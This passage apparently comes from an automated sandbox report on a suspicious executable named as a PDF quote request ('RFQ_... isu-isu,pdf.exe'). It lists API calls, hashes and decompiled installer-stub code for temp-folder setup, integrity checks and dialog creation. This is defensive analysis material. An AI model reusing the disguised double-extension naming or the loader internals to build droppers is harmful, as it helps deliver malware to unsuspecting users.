                                                                        0x0040209b
                                                                        0x00402932
                                                                        0x0040293e

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008001), ref: 00401FE7
                                                                        • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00402011
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000,?), ref: 00404D9B
                                                                          • Part of subcall function 00404D62: lstrlenA.KERNEL32(00402FF7,0079ED60,00000000,0078ED38,00789938,?,?,?,?,?,?,?,?,?,00402FF7,00000000), ref: 00404DAB
                                                                          • Part of subcall function 00404D62: lstrcatA.KERNEL32(0079ED60,00402FF7,00402FF7,0079ED60,00000000,0078ED38,00789938), ref: 00404DBE
                                                                          • Part of subcall function 00404D62: SetWindowTextA.USER32(0079ED60,0079ED60), ref: 00404DD0
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404DF6
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E10
                                                                          • Part of subcall function 00404D62: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E1E
                                                                        • LoadLibraryA.KERNELBASE(00000000,00000001,000000F0), ref: 0040201E
                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 0040202E
                                                                        • FreeLibrary.KERNEL32(00000000,000000F7,?), ref: 00402087
                                                                        • SetErrorMode.KERNEL32 ref: 0040209B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: MessageSend$ErrorLibraryModelstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                        • String ID:
                                                                        • API String ID: 1609199483-0
                                                                        • Opcode ID: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                        • Instruction ID: 46783d0d57a84ebc5ebfcf140bac70f9b04df1374f396a157ff0b90552cbbe62
                                                                        • Opcode Fuzzy Hash: dec3fbaa8690636eaa49f40ab7a36df9d34a383e5316d53f08f1eda561668ae6
                                                                        • Instruction Fuzzy Hash: 19210B31D04321EBCB216F659E8C95F7A70AF95315B20413BF712B62D1C7BC4A82DA9E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00405C94(CHAR* _a4) {
                                                                        				void* _t3;
                                                                        				void* _t8;
                                                                        
                                                                        				SetErrorMode(0x8001); // executed
                                                                        				_t3 = FindFirstFileA(_a4, 0x7a15d0); // executed
                                                                        				_t8 = _t3; // executed
                                                                        				SetErrorMode(0); // executed
                                                                        				if(_t8 == 0xffffffff) {
                                                                        					return 0;
                                                                        				}
                                                                        				FindClose(_t8); // executed
                                                                        				return 0x7a15d0;
                                                                        			}





                                                                        0x00405ca2
                                                                        0x00405cae
                                                                        0x00405cb6
                                                                        0x00405cb8
                                                                        0x00405cbd
                                                                        0x00000000
                                                                        0x00405cca
                                                                        0x00405cc0
                                                                        0x00000000

                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00008001,00000000,007A0988,C:\Users\user\AppData\Local\Temp\,004055EF,007A0988,007A0988,00000000,007A0988,007A0988,?,?,00000000,00405315,?,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ), ref: 00405CA2
                                                                        • FindFirstFileA.KERNELBASE(?,007A15D0), ref: 00405CAE
                                                                        • SetErrorMode.KERNELBASE(00000000), ref: 00405CB8
                                                                        • FindClose.KERNELBASE(00000000), ref: 00405CC0
                                                                        Strings
                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C94
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ErrorFindMode$CloseFileFirst
                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                        • API String ID: 2885216544-3081826266
                                                                        • Opcode ID: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                        • Instruction ID: 58bb4516a74dc5dde44cdc206f1ac441c4a30f5218be24d725a78a1f01f55fab
                                                                        • Opcode Fuzzy Hash: 2793f7a1020c472c0b2cc591d231d4d262c91262e7ffd9c0c44dd2ab926118f0
                                                                        • Instruction Fuzzy Hash: 6AE08632B1971057D20057B45D88D0B3AA8D7C5721F100132F211B73D0D5755C114BE5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00403526() {
                                                                        				intOrPtr _v4;
                                                                        				intOrPtr _v8;
                                                                        				int _v12;
                                                                        				int _v16;
                                                                        				char _v20;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				intOrPtr* _t20;
                                                                        				void* _t28;
                                                                        				void* _t30;
                                                                        				int _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t37;
                                                                        				int _t38;
                                                                        				int _t42;
                                                                        				char _t61;
                                                                        				CHAR* _t63;
                                                                        				signed char _t67;
                                                                        				CHAR* _t78;
                                                                        				intOrPtr _t80;
                                                                        				CHAR* _t82;
                                                                        				CHAR* _t84;
                                                                        				CHAR* _t85;
                                                                        
                                                                        				_t80 =  *0x7a2f88;
                                                                        				_t20 = E00405CD2("KERNEL32.dll", "GetUserDefaultUILanguage");
                                                                        				_t88 = _t20;
                                                                        				if(_t20 == 0) {
                                                                        					_t78 = 0x79f580;
                                                                        					"1033" = 0x7830;
                                                                        					E004058B3(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x79f580);
                                                                        					__eflags =  *0x79f580;
                                                                        					if(__eflags == 0) {
                                                                        						E004058B3(0x80000003, ".DEFAULT\\Control Panel\\International", "Locale", 0x79f580);
                                                                        					}
                                                                        					lstrcatA("1033", _t78);
                                                                        				} else {
                                                                        					E0040591D("1033",  *_t20() & 0x0000ffff);
                                                                        				}
                                                                        				E004037F2(_t75, _t88);
                                                                        				_t84 = "C:\\Users\\jones\\AppData\\Local\\Temp";
                                                                        				 *0x7a3000 =  *0x7a2f90 & 0x00000020;
                                                                        				if(E004055AC(_t88, _t84) != 0) {
                                                                        					L16:
                                                                        					if(E004055AC(_t96, _t84) == 0) {
                                                                        						_push( *((intOrPtr*)(_t80 + 0x118)));
                                                                        						_push(_t84);
                                                                        						E004059E1(0, _t78, _t80);
                                                                        					}
                                                                        					_t28 = LoadImageA( *0x7a2f80, 0x67, 1, 0, 0, 0x8040); // executed
                                                                        					 *0x7a2768 = _t28;
                                                                        					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                        						L21:
                                                                        						if(E00401410(0) == 0) {
                                                                        							_t30 = E004037F2(_t75, __eflags);
                                                                        							__eflags =  *0x7a3020;
                                                                        							if( *0x7a3020 != 0) {
                                                                        								_t31 = E00404E34(_t30, 0);
                                                                        								__eflags = _t31;
                                                                        								if(_t31 == 0) {
                                                                        									E00401410(1);
                                                                        									goto L33;
                                                                        								}
                                                                        								__eflags =  *0x7a274c;
                                                                        								if( *0x7a274c == 0) {
                                                                        									E00401410(2);
                                                                        								}
                                                                        								goto L22;
                                                                        							}
                                                                        							ShowWindow( *0x79f560, 5);
                                                                        							_t85 = "RichEd20.dll";
                                                                        							_t37 = LoadLibraryA(_t85);
                                                                        							__eflags = _t37;
                                                                        							if(_t37 == 0) {
                                                                        								M004092B6 = 0x3233;
                                                                        								LoadLibraryA(_t85);
                                                                        							}
                                                                        							_t82 = "RichEdit20A";
                                                                        							_t38 = GetClassInfoA(0, _t82, 0x7a2720);
                                                                        							__eflags = _t38;
                                                                        							if(_t38 == 0) {
                                                                        								 *0x4092ac = 0;
                                                                        								GetClassInfoA(0, _t82, 0x7a2720);
                                                                        								 *0x7a2744 = _t82;
                                                                        								 *0x4092ac = 0x32;
                                                                        								RegisterClassA(0x7a2720);
                                                                        							}
                                                                        							_t42 = DialogBoxParamA( *0x7a2f80,  *0x7a2760 + 0x00000069 & 0x0000ffff, 0, E004038BF, 0);
                                                                        							E00401410(5);
                                                                        							return _t42;
                                                                        						}
                                                                        						L22:
                                                                        						_t34 = 2;
                                                                        						return _t34;
                                                                        					} else {
                                                                        						_t75 =  *0x7a2f80;
                                                                        						 *0x7a2734 = _t28;
                                                                        						_v20 = 0x624e5f;
                                                                        						 *0x7a2724 = E00401000;
                                                                        						 *0x7a2730 =  *0x7a2f80;
                                                                        						 *0x7a2744 =  &_v20;
                                                                        						if(RegisterClassA(0x7a2720) == 0) {
                                                                        							L33:
                                                                        							__eflags = 0;
                                                                        							return 0;
                                                                        						}
                                                                        						_t12 =  &_v16; // 0x624e5f
                                                                        						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                        						 *0x79f560 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a2f80, 0);
                                                                        						goto L21;
                                                                        					}
                                                                        				} else {
                                                                        					_t75 =  *(_t80 + 0x48);
                                                                        					if(_t75 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					_t78 = 0x7a1f20;
                                                                        					E004058B3( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) +  *0x7a2fb8, 0x7a1f20);
                                                                        					_t61 =  *0x7a1f20; // 0x49
                                                                        					if(_t61 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					if(_t61 == 0x22) {
                                                                        						_t78 = 0x7a1f21;
                                                                        						 *((char*)(E004054F7(0x7a1f21, 0x22))) = 0;
                                                                        					}
                                                                        					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                        					if(_t63 <= _t78 || lstrcmpiA(_t63, ".exe") != 0) {
                                                                        						L15:
                                                                        						E004059BF(_t84, E004054CC(_t78));
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t67 = GetFileAttributesA(_t78);
                                                                        						if(_t67 == 0xffffffff) {
                                                                        							L14:
                                                                        							E00405513(_t78);
                                                                        							goto L15;
                                                                        						}
                                                                        						_t96 = _t67 & 0x00000010;
                                                                        						if((_t67 & 0x00000010) != 0) {
                                                                        							goto L15;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        			}



























                                                                        0x0040352c
                                                                        0x0040353d
                                                                        0x00403544
                                                                        0x00403546
                                                                        0x0040355a
                                                                        0x0040355f
                                                                        0x00403575
                                                                        0x0040357a
                                                                        0x00403580
                                                                        0x00403592
                                                                        0x00403592
                                                                        0x0040359d
                                                                        0x00403548
                                                                        0x00403553
                                                                        0x00403553
                                                                        0x004035a2
                                                                        0x004035ac
                                                                        0x004035b5
                                                                        0x004035c1
                                                                        0x00403647
                                                                        0x0040364f
                                                                        0x00403651
                                                                        0x00403657
                                                                        0x00403658
                                                                        0x00403658
                                                                        0x0040366e
                                                                        0x00403674
                                                                        0x00403682
                                                                        0x00403711
                                                                        0x00403719
                                                                        0x00403723
                                                                        0x00403728
                                                                        0x0040372e
                                                                        0x004037c0
                                                                        0x004037c5
                                                                        0x004037c7
                                                                        0x004037e3
                                                                        0x00000000
                                                                        0x004037e3
                                                                        0x004037c9
                                                                        0x004037cf
                                                                        0x004037d7
                                                                        0x004037d7
                                                                        0x00000000
                                                                        0x004037cf
                                                                        0x0040373c
                                                                        0x00403748
                                                                        0x0040374e
                                                                        0x00403750
                                                                        0x00403752
                                                                        0x00403755
                                                                        0x0040375e
                                                                        0x0040375e
                                                                        0x00403766
                                                                        0x0040376e
                                                                        0x00403770
                                                                        0x00403772
                                                                        0x00403777
                                                                        0x0040377d
                                                                        0x00403780
                                                                        0x00403786
                                                                        0x0040378d
                                                                        0x0040378d
                                                                        0x004037ac
                                                                        0x004037b6
                                                                        0x00000000
                                                                        0x004037bb
                                                                        0x0040371b
                                                                        0x0040371d
                                                                        0x00000000
                                                                        0x00403688
                                                                        0x00403688
                                                                        0x0040368e
                                                                        0x00403698
                                                                        0x004036a0
                                                                        0x004036aa
                                                                        0x004036b0
                                                                        0x004036be
                                                                        0x004037e8
                                                                        0x004037e8
                                                                        0x00000000
                                                                        0x004037e8
                                                                        0x004036c4
                                                                        0x004036cd
                                                                        0x0040370c
                                                                        0x00000000
                                                                        0x0040370c
                                                                        0x004035c7
                                                                        0x004035c7
                                                                        0x004035cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004035d6
                                                                        0x004035e5
                                                                        0x004035ea
                                                                        0x004035f1
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004035f5
                                                                        0x004035f7
                                                                        0x00403604
                                                                        0x00403604
                                                                        0x0040360c
                                                                        0x00403612
                                                                        0x0040363a
                                                                        0x00403642
                                                                        0x00000000
                                                                        0x00403624
                                                                        0x00403625
                                                                        0x0040362e
                                                                        0x00403634
                                                                        0x00403635
                                                                        0x00000000
                                                                        0x00403635
                                                                        0x00403630
                                                                        0x00403632
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00403632
                                                                        0x00403612

                                                                        APIs
                                                                          • Part of subcall function 00405CD2: GetModuleHandleA.KERNEL32(000000F1,0040571A,KERNEL32.dll,MoveFileExA,?,00000000,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CD6
                                                                          • Part of subcall function 00405CD2: LoadLibraryA.KERNEL32(000000F1,?,?,004054BC,?,00000000,000000F1,?), ref: 00405CE4
                                                                          • Part of subcall function 00405CD2: GetProcAddress.KERNEL32(00000000,00000000), ref: 00405CF3
                                                                        • lstrcatA.KERNEL32(1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000,00000000,C:\Users\user\AppData\Local\Temp\,00000020), ref: 0040359D
                                                                        • lstrlenA.KERNEL32(007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage,"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" ,00000000), ref: 00403607
                                                                        • lstrcmpiA.KERNEL32(?,.exe,007A1F20,?,?,?,007A1F20,C:\Users\user\AppData\Local\Temp,1033,0079F580,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F580,KERNEL32.dll,GetUserDefaultUILanguage), ref: 0040361A
                                                                        • GetFileAttributesA.KERNEL32(007A1F20), ref: 00403625
                                                                        • LoadImageA.USER32 ref: 0040366E
                                                                        • RegisterClassA.USER32 ref: 004036B5
                                                                          • Part of subcall function 0040591D: wsprintfA.USER32 ref: 0040592A
                                                                        • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036CD
                                                                        • CreateWindowExA.USER32 ref: 00403706
                                                                        • ShowWindow.USER32(00000005,00000000), ref: 0040373C
                                                                        • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040374E
                                                                        • LoadLibraryA.KERNEL32(RichEd20.dll), ref: 0040375E
                                                                        • GetClassInfoA.USER32 ref: 0040376E
                                                                        • GetClassInfoA.USER32 ref: 0040377D
                                                                        • RegisterClassA.USER32 ref: 0040378D
                                                                        • DialogBoxParamA.USER32 ref: 004037AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.656376259.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.656371436.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656383603.0000000000407000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656389325.0000000000409000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656419100.000000000077A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656424293.0000000000784000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656429564.0000000000788000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656484427.0000000000795000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656489285.00000000007A1000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656510078.00000000007A9000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.656514885.00000000007AC000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: 'z$"C:\Users\user\Desktop\RFQ_AP65425652_032421 isu-isu,pdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$GetUserDefaultUILanguage$KERNEL32.dll$Locale$RichEd20.dll$RichEdit20A$_Nb
                                                                        • API String ID: 914957316-1414530842
                                                                        • Opcode ID: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                        • Instruction ID: 4e9c7f181e94f196de7c88ece58cce9fa533c44585b571451200f5668265d8f3
                                                                        • Opcode Fuzzy Hash: 3309331118697da18f1ff15fefd605bdcd3012e4522bb3cb26734b4951d889a7
                                                                        • Instruction Fuzzy Hash: 5361C2B1504240BFE720AF699D45E2B3AACEB85759B00457FF941B22E2D73D9D018B2E
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00402C37(void* __eflags, signed int _a4) {
                                                                        				struct HWND__* _v8;
                                                                        				char _v12;
                                                                        				long _v16;
                                                                        				void* _v20;
                                                                        				intOrPtr _v24;
                                                                        				long _v28;
                                                                        				intOrPtr _v32;
                                                                        				intOrPtr _v36;
                                                                        				intOrPtr _v40;
                                                                        				intOrPtr _v44;
                                                                        				signed int _v48;
                                                                        				long _t52;
                                                                        				long _t56;
                                                                        				void* _t58;
                                                                        				void* _t62;
                                                                        				intOrPtr* _t66;
                                                                        				long _t67;
                                                                        				long _t78;
                                                                        				void* _t79;
                                                                        				intOrPtr _t89;
                                                                        				void* _t91;
                                                                        				long _t92;
                                                                        				void* _t93;
                                                                        				signed int _t94;
                                                                        				signed int _t95;
                                                                        				void* _t97;
                                                                        				long _t101;
                                                                        				void* _t102;
                                                                        
                                                                        				_v8 = 0;
                                                                        				_t52 = GetTickCount();
                                                                        				_v16 = 0;
                                                                        				_v12 = 0;
                                                                        				_t100 = "C:\\Users\\jones\\Desktop";
                                                                        				_t97 = _t52 + 0x3e8;
                                                                        				GetModuleFileNameA( *0x7a2f80, "C:\\Users\\jones\\Desktop", 0x400);
                                                                        				_t91 = E00405690(_t100, 0x80000000, 3);
                                                                        				_v20 = _t91;
                                                                        				 *0x409020 = _t91;
                                                                        				if(_t91 == 0xffffffff) {
                                                                        					return "Error launching installer";
                                                                        				}
                                                                        				E00405513(_t100);
                                                                        				_t56 = GetFileSize(_t91, 0);
                                                                        				 *0x79d938 = _t56;
                                                                        				_t101 = _t56;
                                                                        				if(_t56 <= 0) {
                                                                        					L27:
                                                                        					if( *0x7a2f8c == 0) {
                                                                        						goto L33;
                                                                        					}
                                                                        					if(_v12 == 0) {
                                                                        						L31:
                                                                        						_t58 = GlobalAlloc(0x40, _v28); // executed
                                                                        						_t102 = _t58;
                                                                        						E004030FF( *0x7a2f8c + 0x1c);
                                                                        						_push(_v28);
                                                                        						_push(_t102);
                                                                        						_push(0);
                                                                        						_push(0xffffffff); // executed
                                                                        						_t62 = E00402EBD(); // executed
                                                                        						if(_t62 == _v28) {
                                                                        							 *0x7a2f88 = _t102;
                                                                        							if((_a4 & 0x00000002) != 0) {
                                                                        								 *_t102 =  *_t102 | 0x00000008;
                                                                        							}
                                                                        							 *0x7a3020 =  *_t102 & 0x00000018;
                                                                        							 *0x7a2f90 =  *_t102;
                                                                        							if((_v48 & 0x00000001) != 0) {
                                                                        								 *0x7a2f94 =  *0x7a2f94 + 1;
                                                                        							}
                                                                        							_t49 = _t102 + 0x44; // 0x44
                                                                        							_t66 = _t49;
                                                                        							_t93 = 8;
                                                                        							do {
                                                                        								_t66 = _t66 - 8;
                                                                        								 *_t66 =  *_t66 + _t102;
                                                                        								_t93 = _t93 - 1;
                                                                        							} while (_t93 != 0);
                                                                        							_t67 = SetFilePointer(_v20, 0, 0, 1); // executed
                                                                        							 *(_t102 + 0x3c) = _t67;
                                                                        							E00405670(0x7a2fa0, _t102 + 4, 0x40);
                                                                        							return 0;
                                                                        						}
                                                                        						GlobalFree(_t102);
                                                                        						goto L33;
                                                                        					}
                                                                        					E004030FF( *0x789930);
                                                                        					if(E004030CD( &_v12, 4) == 0 || _v16 != _v12) {
                                                                        						goto L33;
                                                                        					} else {
                                                                        						goto L31;
                                                                        					}
                                                                        				} else {
                                                                        					do {
                                                                        						_t92 = _t101;
                                                                        						asm("sbb eax, eax");
                                                                        						_t78 = ( ~( *0x7a2f8c) & 0x00007e00) + 0x200;
                                                                        						if(_t101 >= _t78) {
                                                                        							_t92 = _t78;
                                                                        						}
                                                                        						_t79 = E004030CD(0x795938, _t92); // executed
                                                                        						if(_t79 == 0) {
                                                                        							if(_v8 != 0) {
                                                                        								DestroyWindow(_v8);
                                                                        							}
                                                                        							L33:
                                                                        							return "The installer you are trying to use is corrupted or incomplete.\nThis could be the result of a damaged disk, a failed download or a virus.\n\nYou may want to contact the author of this installer to obtain a new copy.\n\nIt may be possible to skip this check using the /NCRC command line switch\n(NOT RECOMMENDED).";
                                                                        						}
                                                                        						if( *0x7a2f8c != 0) {
                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                        								if(_v8 == 0) {
                                                                        									if(GetTickCount() > _t97) {
                                                                        										_v8 = CreateDialogParamA( *0x7a2f80, 0x6f, 0, E00402BAB, "verifying installer: %d%%");
                                                                        									}
                                                                        								} else {
                                                                        									E00405CFC(0);
                                                                        								}
                                                                        							}
                                                                        							goto L22;
                                                                        						}
                                                                        						E00405670( &_v48, 0x795938, 0x1c);
                                                                        						_t94 = _v48;
                                                                        						if((_t94 & 0xfffffff0) == 0 && _v44 == 0xdeadbeef && _v32 == 0x74736e49 && _v36 == 0x74666f73 && _v40 == 0x6c6c754e) {
                                                                        							_t89 = _v24;
                                                                        							if(_t89 > _t101) {
                                                                        								goto L33;
                                                                        							}
                                                                        							_a4 = _a4 | _t94;
                                                                        							_t95 =  *0x789930; // 0x36600
                                                                        							 *0x7a2f8c = _t95;
                                                                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                        								_v12 = _v12 + 1;
                                                                        								_t24 = _t89 - 4; // 0x1c
                                                                        								_t101 = _t24;
                                                                        								if(_t92 > _t101) {
                                                                        									_t92 = _t101;
                                                                        								}
                                                                        								goto L22;
                                                                        							} else {
                                                                        								break;
                                                                        							}
                                                                        						}
                                                                        						L22:
                                                                        						if(_t101 <  *0x79d938) {
                                                                        							_v16 = E00405D2F(_v16, 0x795938, _t92);
                                                                        						}
                                                                        						 *0x789930 =  *0x789930 + _t92;
                                                                        						_t101 = _t101 - _t92;
                                                                        					} while (_t101 > 0);
                                                                        					if(_v8 != 0) {
                                                                        						DestroyWindow(_v8);
                                                                        					}
                                                                        					goto L27;
                                                                        				}
                                                                        			}































                                                                        0x00402c42
                                                                        0x00402c45
                                                                        0x00402c4b
                                                                        0x00402c4e
                                                                        0x00402c51
                                                                        0x00402c64
                                                                        0x00402c6a
                                                                        0x00402c7d
                                                                        0x00402c82
                                                                        0x00402c85
                                                                        0x00402c8b
                                                                        0x00000000
                                                                        0x00402c8d
                                                                        0x00402c98
                                                                        0x00402ca0
                                                                        0x00402ca8
                                                                        0x00402cad
                                                                        0x00402caf
                                                                        0x00402dde
                                                                        0x00402de6
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402deb
                                                                        0x00402e0f
                                                                        0x00402e14
                                                                        0x00402e1a
                                                                        0x00402e25
                                                                        0x00402e2a
                                                                        0x00402e2d
                                                                        0x00402e2e
                                                                        0x00402e2f
                                                                        0x00402e31
                                                                        0x00402e39
                                                                        0x00402e5e
                                                                        0x00402e64
                                                                        0x00402e66
                                                                        0x00402e66
                                                                        0x00402e72
                                                                        0x00402e79
                                                                        0x00402e7e
                                                                        0x00402e80
                                                                        0x00402e80
                                                                        0x00402e88
                                                                        0x00402e88
                                                                        0x00402e8b
                                                                        0x00402e8c
                                                                        0x00402e8c
                                                                        0x00402e8f
                                                                        0x00402e91
                                                                        0x00402e91
                                                                        0x00402e9b
                                                                        0x00402ea1
                                                                        0x00402eaf
                                                                        0x00000000
                                                                        0x00402eb4
                                                                        0x00402e3c
                                                                        0x00000000
                                                                        0x00402e3c
                                                                        0x00402df3
                                                                        0x00402e05
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402cb5
                                                                        0x00402cb5
                                                                        0x00402cba
                                                                        0x00402cbe
                                                                        0x00402cc5
                                                                        0x00402ccc
                                                                        0x00402cce
                                                                        0x00402cce
                                                                        0x00402cd6
                                                                        0x00402cdd
                                                                        0x00402e4d
                                                                        0x00402e52
                                                                        0x00402e52
                                                                        0x00402e42
                                                                        0x00000000
                                                                        0x00402e42
                                                                        0x00402ceb
                                                                        0x00402d70
                                                                        0x00402d75
                                                                        0x00402d87
                                                                        0x00402da3
                                                                        0x00402da3
                                                                        0x00402d77
                                                                        0x00402d78
                                                                        0x00402d78
                                                                        0x00402d75
                                                                        0x00000000
                                                                        0x00402d70
                                                                        0x00402cf8
                                                                        0x00402cfd
                                                                        0x00402d06
                                                                        0x00402d38
                                                                        0x00402d3d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402d43
                                                                        0x00402d46
                                                                        0x00402d50
                                                                        0x00402d56
                                                                        0x00402d5e
                                                                        0x00402d61
                                                                        0x00402d61
                                                                        0x00402d66
                                                                        0x00402d68
                                                                        0x00402d68
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00402d56
                                                                        0x00402da6
                                                                        0x00402dac
                                                                        0x00402dbc
                                                                        0x00402dbc
                                                                        0x00402dbf
                                                                        0x00402dc5
                                                                        0x00402dc7
                                                                        0x00402dd3
                                                                        0x00402dd8
                                                                        0x00402dd8
                                                                        0x00000000
                                                                        0x00402dd3

                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00402C45
                                                                        • GetModuleFileNameA.KERNEL32(C:\Users\user\Desktop,00000400,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402C6A
                                                                          • Part of subcall function 00405690: GetFileAttributesA.KERNELBASE(00000003,00402C7D,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00405694
                                                                          • Part of subcall function 00405690: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 004056B6
                                                                        • GetFileSize.KERNEL32(00000000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,80000000,00000003,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402CA0
                                                                        • DestroyWindow.USER32(00000000,00795938,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402DD8
                                                                        • GlobalAlloc.KERNELBASE(00000040,00000000,?,?,Error writing temporary file. Make sure your temp folder is valid.,004032AF,00000000,00000000,00000020), ref: 00402E14
                                                                        Strings
